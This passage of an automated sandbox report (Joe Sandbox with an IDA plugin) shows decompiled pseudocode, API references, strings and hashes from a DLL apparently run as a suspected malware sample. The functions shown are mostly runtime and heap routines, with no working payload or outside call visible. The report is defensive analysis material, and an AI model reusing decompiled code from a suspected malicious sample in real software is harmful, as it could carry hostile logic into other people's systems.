																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6ecd20f8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}

0x6ecd1bf0
0x6ecd1bf1
0x6ecd1bf2
0x6ecd1bf4
0x6ecd1bf7
0x6ecd1bfb
0x6ecd1bff
0x6ecd1c1e
0x00000000
0x6ecd1c01
0x6ecd1c01
0x6ecd1c05
0x6ecd1c0d
0x6ecd1c2d
0x00000000
0x6ecd1c0f
0x6ecd1c0f
0x6ecd1c14
0x6ecd1c4e
0x6ecd1c58
0x6ecd1c5e
0x6ecd1c60
0x6ecd1cb9
0x6ecd1cbb
0x00000000
0x6ecd1cc1
0x6ecd1cc1
0x6ecd1cd3
0x6ecd1cd9
0x6ecd1cdb
0x6ecd1d55
0x6ecd1d5b
0x6ecd1d5b
0x6ecd1d5d
0x6ecd1cdd
0x6ecd1cdd
0x6ecd1ce1
0x6ecd1ce3
0x6ecd1ce3
0x6ecd1d62
0x6ecd1d64
0x6ecd1d67
0x00000000
0x6ecd1d67
0x6ecd1c62
0x6ecd1c66
0x6ecd1c6a
0x6ecd1c6c
0x6ecd1ce7
0x6ecd1cf8
0x6ecd1cfb
0x6ecd1cfc
0x6ecd1d01
0x6ecd1d04
0x6ecd1d09
0x6ecd1d6f
0x6ecd1d73
0x00000000
0x6ecd1d0b
0x6ecd1d0b
0x6ecd1d10
0x6ecd1de9
0x6ecd1dec
0x6ecd1dec
0x6ecd1df3
0x6ecd1df6
0x6ecd1e2b
0x6ecd1e2b
0x6ecd1e32
0x00000000
0x6ecd1df8
0x6ecd1df8
0x6ecd1dfa
0x00000000
0x6ecd1dfc
0x6ecd1dfc
0x6ecd1e00
0x6ecd1e02
0x00000000
0x6ecd1e02
0x6ecd1dfa
0x00000000
0x6ecd1d16
0x6ecd1d16
0x6ecd1d1a
0x6ecd1d1c
0x6ecd1e85
0x6ecd1e87
0x6ecd1e89
0x00000000
0x6ecd1d22
0x6ecd1d26
0x6ecd1d2a
0x6ecd1d2b
0x6ecd1d30
0x6ecd1d35
0x6ecd1d3a
0x6ecd1d77
0x6ecd1d7b
0x6ecd1d7c
0x6ecd1d7d
0x6ecd1d82
0x00000000
0x6ecd1d82
0x6ecd1d1c
0x6ecd1d10
0x6ecd1c6e
0x6ecd1c6e
0x6ecd1c70
0x6ecd1e54
0x6ecd1e59
0x6ecd1e5c
0x6ecd1e5e
0x6ecd1e6d
0x6ecd1e72
0x6ecd1e75
0x00000000
0x6ecd1c76
0x6ecd1c76
0x6ecd1c78
0x6ecd1c81
0x6ecd1c84
0x6ecd1d3e
0x00000000
0x6ecd1c8a
0x6ecd1c8a
0x6ecd1c91
0x6ecd1c93
0x6ecd1c96
0x6ecd1c9a
0x6ecd1ca1
0x6ecd1ca3
0x6ecd1ca7
0x6ecd1d8a
0x6ecd1d8d
0x6ecd1d90
0x6ecd1e77
0x6ecd1e77
0x6ecd1e79
0x6ecd1e7e
0x6ecd1e8e
0x6ecd1e8e
0x6ecd1e93
0x6ecd1e96
0x00000000
0x6ecd1d96
0x6ecd1d9c
0x6ecd1d9d
0x6ecd1da2
0x6ecd1da5
0x6ecd1daa
0x6ecd1dae
0x6ecd1d42
0x6ecd1d42
0x6ecd1d49
0x00000000
0x6ecd1db0
0x6ecd1db0
0x6ecd1db4
0x6ecd1db8
0x6ecd1dba
0x6ecd1dbd
0x6ecd1e98
0x6ecd1e98
0x6ecd1e9c
0x6ecd1e9e
0x6ecd1ea6
0x6ecd1eaf
0x00000000
0x6ecd1dc3
0x6ecd1dc3
0x6ecd1dcb
0x6ecd1dcc
0x6ecd1dcd
0x6ecd1dd2
0x6ecd1dd5
0x6ecd1dda
0x6ecd1e08
0x6ecd1e0c
0x6ecd1e0f
0x6ecd1e11
0x6ecd1e15
0x6ecd1eb2
0x6ecd1eb6
0x6ecd1eb8
0x6ecd1ec0
0x6ecd1ec5
0x6ecd1ec6
0x6ecd1ec6
0x6ecd1ece
0x6ecd1ed1
0x6ecd1ed6
0x6ecd1ed9
0x6ecd1edf
0x6ecd1f05
0x6ecd1f0b
0x6ecd1f29
0x6ecd1f2f
0x6ecd1fa2
0x6ecd1fa8
0x6ecd205e
0x6ecd2064
0x00000000
0x6ecd2066
0x6ecd2066
0x6ecd206c
0x00000000
0x6ecd206e
0x6ecd206e
0x6ecd2074
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecd2074
0x6ecd206c
0x6ecd1fae
0x6ecd1fae
0x6ecd1fb4
0x00000000
0x6ecd1fba
0x6ecd1fba
0x6ecd1fc0
0x00000000
0x6ecd1fc6
0x6ecd1fc6
0x6ecd1fcc
0x00000000
0x6ecd1fd2
0x00000000
0x6ecd1fd2
0x6ecd1fcc
0x6ecd1fc0
0x6ecd1fb4
0x6ecd1f31
0x6ecd1f31
0x6ecd1f37
0x6ecd2020
0x6ecd2026
0x6ecd20a1
0x6ecd2028
0x6ecd2028
0x6ecd202e
0x6ecd20f1
0x6ecd2034
0x6ecd2034
0x6ecd203a
0x00000000
0x6ecd203c
0x00000000
0x6ecd203c
0x6ecd203a
0x6ecd202e
0x6ecd1f3d
0x6ecd1f3d
0x6ecd1f43
0x6ecd20dd
0x6ecd1f49
0x6ecd1f49
0x6ecd1f4f
0x6ecd20e1
0x6ecd1f55
0x6ecd1f55
0x6ecd1f5b
0x00000000
0x6ecd1f61
0x6ecd1f64
0x6ecd1f64
0x6ecd1f5b
0x6ecd1f4f
0x6ecd1f43
0x6ecd1f37
0x6ecd1f0d
0x6ecd1f0d
0x6ecd1f13
0x6ecd1f16
0x6ecd1f23
0x6ecd1f23
0x6ecd200e
0x6ecd2011
0x00000000
0x6ecd2013
0x6ecd2013
0x6ecd2019
0x00000000
0x6ecd201b
0x00000000
0x6ecd201b
0x6ecd2019
0x6ecd2011
0x6ecd1ee1
0x6ecd1ee1
0x6ecd1ee7
0x6ecd1f65
0x6ecd1f6b
0x6ecd1fd7
0x6ecd1fdd
0x6ecd2082
0x6ecd2088
0x6ecd2099
0x6ecd208a
0x6ecd208a
0x6ecd2090
0x00000000
0x6ecd2092
0x6ecd2095
0x6ecd2095
0x6ecd2090
0x6ecd1fe3
0x6ecd1fe3
0x6ecd1fe9
0x6ecd20ed
0x6ecd1fef
0x6ecd1fef
0x6ecd1ff5
0x6ecd209d
0x6ecd1ffb
0x6ecd1ffb
0x6ecd2001
0x00000000
0x6ecd2003
0x00000000
0x6ecd2003
0x6ecd2001
0x6ecd1ff5
0x6ecd1fe9
0x6ecd1f6d
0x6ecd1f6d
0x6ecd1f73
0x6ecd2041
0x6ecd2047
0x00000000
0x6ecd2049
0x6ecd2049
0x6ecd204f
0x00000000
0x6ecd2051
0x6ecd2051
0x6ecd2057
0x00000000
0x6ecd2059
0x00000000
0x6ecd2059
0x6ecd2057
0x6ecd204f
0x6ecd1f79
0x6ecd1f79
0x6ecd1f7f
0x6ecd20e5
0x6ecd1f85
0x6ecd1f85
0x6ecd1f8b
0x6ecd20e9
0x6ecd1f91
0x6ecd1f91
0x6ecd1f97
0x6ecd2076
0x6ecd2079
0x6ecd1f9d
0x00000000
0x6ecd1f9d
0x6ecd1f97
0x6ecd1f8b
0x6ecd1f7f
0x6ecd1f73
0x6ecd1ee9
0x6ecd1ee9
0x6ecd1eec
0x6ecd1ef2
0x6ecd1ef8
0x6ecd1eff
0x6ecd1eff
0x6ecd20f2
0x6ecd20f5
0x6ecd20f5
0x6ecd1ee7
0x6ecd1e1b
0x6ecd1e1b
0x6ecd1e1b
0x6ecd1e1d
0x6ecd1e24
0x00000000
0x6ecd1e24
0x6ecd1ddc
0x6ecd1ddc
0x6ecd1de2
0x6ecd1e39
0x6ecd1e39
0x6ecd1e3e
0x00000000
0x6ecd1e3e
0x6ecd1dda
0x6ecd1dbd
0x6ecd1dae
0x6ecd1cad
0x6ecd1cad
0x6ecd1c25
0x6ecd1c25
0x00000000
0x6ecd1c25
0x6ecd1ca7
0x6ecd1c84
0x6ecd1c70
0x6ecd1c6c
0x6ecd1c16
0x6ecd1c16
0x6ecd1c32
0x6ecd1c32
0x6ecd1c39
0x6ecd1c3c
0x6ecd1c3c
0x6ecd1c42
0x6ecd1c49
0x6ecd1c49
0x6ecd1c14
0x6ecd1c0d

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6ECD1A7E,?), ref: 6ECD1C05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6ECD1A7E,?), ref: 6ECD1C16
GetConsoleMode.KERNEL32(00000000,?), ref: 6ECD1C58
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ECD1CD3
GetLastError.KERNEL32(?,?,?,00000000), ref: 6ECD1D55

Strings

Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6ECD1E45
assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6ECD1E5E

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ErrorLast$ConsoleFileHandleModeWrite
String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
API String ID: 4172320683-1866377508
Opcode ID: 07e341d365b9c6b8543f9afc8d81cf65bae616c6383f23229893292852d08292
Instruction ID: 51bd62e13f2b8e4f412f90848c4dfec3ca8dc9f40712b1481bac164e9e54b025
Opcode Fuzzy Hash: 07e341d365b9c6b8543f9afc8d81cf65bae616c6383f23229893292852d08292
Instruction Fuzzy Hash: 4F71E5706083459FD3149FA9D4547AB7BE9BB86348F10882DE5E68B384F732D94CCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC4D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6ECCC4D0(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6ECD3990;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				__imp__AcquireSRWLockExclusive(0x6ed1e108, __esi, __edi, __ebx);
				_t47 =  *0x6ed1d038; // 0x1
				_t50 =  *0x6ed1d03c; // 0x0
				_v40 = 0x6ed1e108;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6ed1e108);
					_v20 = 0;
					_t22 = E6ECE99A0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6ed0fa80);
					goto L10;
				} else {
					 *0x6ed1d038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6ed1d03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6ECE94E0(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6ed0fa90);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6ECCC6B0(_t22,  &_v40);
						}
						return E6ECCC690( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6ed1e108);
						_t29 =  *0x6ed1e128; // 0xa40000
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6ECE92F0(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6ed1e128 = _t29;
								goto L5;
							}
						}
					}
				}
			}

0x6eccc4d0
0x6eccc4d9
0x6eccc4dc
0x6eccc4e3
0x6eccc4f4
0x6eccc4f7
0x6eccc4fd
0x6eccc509
0x6eccc50f
0x6eccc515
0x6eccc51b
0x6eccc524
0x6eccc529
0x6eccc5bf
0x6eccc5bf
0x6eccc5c7
0x6eccc5cd
0x6eccc5e3
0x00000000
0x6eccc52f
0x6eccc536
0x6eccc53d
0x6eccc542
0x6eccc548
0x6eccc5ed
0x6eccc5f0
0x6eccc606
0x6eccc60e
0x6eccc60e
0x6eccc617
0x6eccc61b
0x6eccc620
0x6eccc620
0x6eccc631
0x6eccc54e
0x6eccc553
0x6eccc559
0x6eccc560
0x6eccc570
0x6eccc575
0x6eccc57c
0x00000000
0x6eccc57e
0x6eccc57e
0x6eccc581
0x6eccc584
0x6eccc58b
0x6eccc58f
0x6eccc595
0x6eccc59f
0x6eccc5ad
0x6eccc5ad
0x6eccc562
0x6eccc562
0x6eccc569
0x6eccc5ae
0x6eccc5b3
0x6eccc5b8
0x6eccc5bd
0x00000000
0x6eccc56b
0x6eccc56b
0x00000000
0x6eccc56b
0x6eccc569
0x6eccc560
0x6eccc548

APIs

AcquireSRWLockExclusive.KERNEL32(6ED1E108), ref: 6ECCC509
ReleaseSRWLockExclusive.KERNEL32(6ED1E108), ref: 6ECCC553
GetProcessHeap.KERNEL32 ref: 6ECCC562
HeapAlloc.KERNEL32(00A40000,00000000,00000020), ref: 6ECCC575
ReleaseSRWLockExclusive.KERNEL32(6ED1E108), ref: 6ECCC5C7

Strings

failed to generate unique thread ID: bitspace exhausted, xrefs: 6ECCC5D4
called `Option::unwrap()` on a `None` value, xrefs: 6ECCC5F7

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 1780889587-1657987152
Opcode ID: 94f78df136a16d380f70b278f3954ddb1ad2c04c966b9f6377ff1a6fea83f0ab
Instruction ID: caf0adce650e4ec73b6d0c9679ecb532b488480f5c500da24efe51c2df04dd86
Opcode Fuzzy Hash: 94f78df136a16d380f70b278f3954ddb1ad2c04c966b9f6377ff1a6fea83f0ab
Instruction Fuzzy Hash: B031E3B0D002048FEB10CFD5C819BEDBBB4EB89724F144129D815AF7C0E775994ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC10A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ECC10A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6ECD3950;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6ed1e128; // 0xa40000
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6ed0da37]");
						asm("movsd xmm1, [0x6ed0da30]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6ed1e128; // 0xa40000
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6ed0da47]");
								asm("movsd xmm1, [0x6ed0da3f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6ECE9300(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6ECE9280( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6ECDD4D0(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6ECDBE30(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6ed1e128, 0, _v36);
								}
								HeapFree( *0x6ed1e128, 0, _v40);
								_t54 = _v28;
								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6ed1e128 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6ECE92F0(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6ECC1000(_v52, _v48);
						return E6ECC1000(_v40, 0xf);
					} else {
						 *0x6ed1e128 = _t45;
						goto L3;
					}
				}
				L21:
			}

0x6ecc10a0
0x6ecc10a0
0x6ecc10a0
0x6ecc10a3
0x6ecc10a4
0x6ecc10a5
0x6ecc10a6
0x6ecc10a9
0x6ecc10ac
0x6ecc10b3
0x6ecc10c4
0x6ecc10c7
0x6ecc10cd
0x6ecc10d4
0x6ecc10e8
0x6ecc10ed
0x6ecc10f4
0x00000000
0x6ecc10fa
0x6ecc10fa
0x6ecc1102
0x6ecc110a
0x6ecc110d
0x6ecc1112
0x6ecc1116
0x6ecc111d
0x6ecc1131
0x6ecc1136
0x6ecc113d
0x00000000
0x6ecc1143
0x6ecc1143
0x6ecc114b
0x6ecc1153
0x6ecc1155
0x6ecc115a
0x6ecc115d
0x6ecc1164
0x6ecc1169
0x6ecc1192
0x6ecc1195
0x6ecc1198
0x00000000
0x00000000
0x6ecc119a
0x6ecc119a
0x6ecc11a0
0x6ecc11a2
0x6ecc1235
0x6ecc123c
0x6ecc1241
0x00000000
0x6ecc11a8
0x6ecc11ab
0x6ecc11ad
0x6ecc11b5
0x6ecc11b8
0x6ecc11bb
0x6ecc11c2
0x6ecc11c5
0x6ecc11ca
0x6ecc11cd
0x6ecc11d0
0x6ecc11d3
0x6ecc11d6
0x6ecc11d6
0x6ecc1171
0x6ecc1175
0x6ecc117e
0x6ecc1180
0x6ecc1185
0x6ecc1188
0x6ecc118a
0x6ecc118d
0x6ecc1191
0x00000000
0x6ecc1191
0x00000000
0x6ecc11a2
0x6ecc11db
0x6ecc11e5
0x6ecc11f2
0x6ecc11fa
0x6ecc11fe
0x6ecc120b
0x6ecc120b
0x6ecc121b
0x6ecc1220
0x6ecc1223
0x6ecc1230
0x6ecc1230
0x6ecc111f
0x6ecc111f
0x6ecc1126
0x6ecc124a
0x6ecc124a
0x00000000
0x6ecc112c
0x6ecc112c
0x00000000
0x6ecc112c
0x6ecc1126
0x6ecc111d
0x6ecc10d6
0x6ecc10d6
0x6ecc10dd
0x6ecc1243
0x6ecc1243
0x6ecc124f
0x6ecc1254
0x6ecc1259
0x6ecc1264
0x6ecc126d
0x6ecc1283
0x6ecc10e3
0x6ecc10e3
0x00000000
0x6ecc10e3
0x6ecc10dd
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6ECC10D6
HeapAlloc.KERNEL32(00A40000,00000000,0000000F), ref: 6ECC10ED
GetProcessHeap.KERNEL32(00A40000,00000000,0000000F), ref: 6ECC111F
HeapAlloc.KERNEL32(00A40000,00000000,00000010,00A40000,00000000,0000000F), ref: 6ECC1136
HeapFree.KERNEL32(00000000,?,00000000,00000010,00A40000,00000000,0000000F), ref: 6ECC120B
HeapFree.KERNEL32(00000000,?,00000000,00000010,00A40000,00000000,0000000F), ref: 6ECC121B

Strings

Control_RunDLL, xrefs: 6ECC114B
Control_RunDLL, xrefs: 6ECC1102

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Heap$AllocFreeProcess
String ID: Control_RunDLL$Control_RunDLL
API String ID: 2113670309-2490747307
Opcode ID: 56286ad3debf0a60a9e40463cfc0458278e6779877ac2a29c0eaeeb97a8376f9
Instruction ID: 9e63ef30d344cda6ee9ce36a943f3610d59f368079f2ab12a6fd2da9cf4423fa
Opcode Fuzzy Hash: 56286ad3debf0a60a9e40463cfc0458278e6779877ac2a29c0eaeeb97a8376f9
Instruction Fuzzy Hash: 2751AFB5D006099FEB00CFEACC80BDEB7B9FF89714F104529E9056B684E775A845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDEF20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6ECDEF57
___except_validate_context_record.LIBVCRUNTIME ref: 6ECDEF5F
_ValidateLocalCookies.LIBCMT ref: 6ECDEFE8
__IsNonwritableInCurrentImage.LIBCMT ref: 6ECDF013
_ValidateLocalCookies.LIBCMT ref: 6ECDF068

Strings

csm, xrefs: 6ECDEFFD

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 756435211ba0e6cdf97cac892363a5c4902293f20037f92591492c2719f28f7d
Instruction ID: 12e3ac67a350981ae2a79a22648d13aeb001d8990e963e02b1aac6b3398b669e
Opcode Fuzzy Hash: 756435211ba0e6cdf97cac892363a5c4902293f20037f92591492c2719f28f7d
Instruction Fuzzy Hash: D0416034E102199FCF00CFE9C881ADEBBB9BF45328F108555E9249B395E736E909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ECD2960, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6ED1E114), ref: 6ECD2994
TlsAlloc.KERNEL32 ref: 6ECD29AA
GetProcessHeap.KERNEL32 ref: 6ECD29C4
HeapAlloc.KERNEL32(00A40000,00000000,0000000C), ref: 6ECD29DB
ReleaseSRWLockExclusive.KERNEL32(6ED1E114), ref: 6ECD2A18

Strings

